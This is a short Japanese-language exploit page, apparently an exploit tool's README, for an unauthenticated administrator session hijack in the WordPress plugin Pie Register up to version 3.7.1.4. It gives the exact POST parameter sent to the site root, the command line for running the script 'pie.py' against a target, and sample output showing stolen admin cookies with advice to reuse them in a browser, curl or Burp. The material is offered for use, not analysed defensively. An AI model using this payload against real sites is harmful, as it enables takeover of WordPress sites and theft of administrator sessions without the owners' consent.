
WordPress Pie Register ≤ 3.7.1.4 - 管理者権限昇格(未認証)
Mrj Haxcore
WordPress用プラグイン Pie Register (バージョン ≤ 3.7.1.4) は、認証不要のエンドポイントを公開しており、攻撃者は特定のペイロードをPOSTするだけで管理者セッションを乗っ取ることができます。
この悪用により、ログイン資格情報を一切必要とせずに、ユーザーID 1(通常は admin) のセッションCookieを窃取できます。
pie-registeruser_id_social_site=1
このパラメータをルートURL (/) にPOSTすると、プラグインは攻撃者をID 1(通常は admin) のユーザーとして認証し、有効なセッションCookieを発行します。
requests、beautifulsoup4 (任意、Cookie解析用)python3 pie.py http://target.site
---
Output
[*] Sending payload to hijack admin session...
[+] Successfully hijacked cookies for user_id=1 (admin):
wordpress_sec_xxxxxx = <cookie_value>
wordpress_logged_in_xxxxxx = <cookie_value>
[!] Use these cookies in your browser or tools like curl or Burp to act as admin.